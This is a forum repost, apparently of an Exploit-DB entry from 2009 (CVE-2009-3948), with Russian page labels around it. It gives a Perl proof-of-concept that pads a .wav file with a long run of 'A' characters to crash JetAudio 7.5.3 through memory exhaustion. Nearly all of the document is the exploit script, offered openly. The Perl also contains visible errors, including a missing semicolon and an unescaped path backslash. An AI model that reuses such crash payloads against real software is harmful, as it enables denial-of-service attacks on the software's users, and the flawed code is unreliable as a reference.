Exploit JetAudio 7.5.3 COWON Media Center - '.wav' Crash

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
9139
Проверка EDB
  1. Пройдено
Автор
PRODIGY
Тип уязвимости
DOS
Платформа
WINDOWS
CVE
cve-2009-3948
Дата публикации
2009-07-14
Код:
#!/usr/bin/perl -w
#
# JetAudio 7.5.3 COWON Media Center(.WAV file) Memory Comsumption DoS Exploit
#
# Founded and exploited by prodigy
# 
# Vendor: JetAudio
#
# Usage to reproduce the bug: you need a file of recorded music in .wav,and then open it with JetAudio and booom!
#
# Platform: Windows
#
###################################################################

==PoC==

use strict;

use diagnostics;

my $file= "c:\filerecorder.wav" #the file must be recorded with music

my $boom= "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" x 5000;

open($FILE,">>$file");

print $FILE "$boom";

close($FILE);

==EndPoC==


##Greetz: Greetz myself for find the bug.

# milw0rm.com [2009-07-14]
 
Источник
www.exploit-db.com

Похожие темы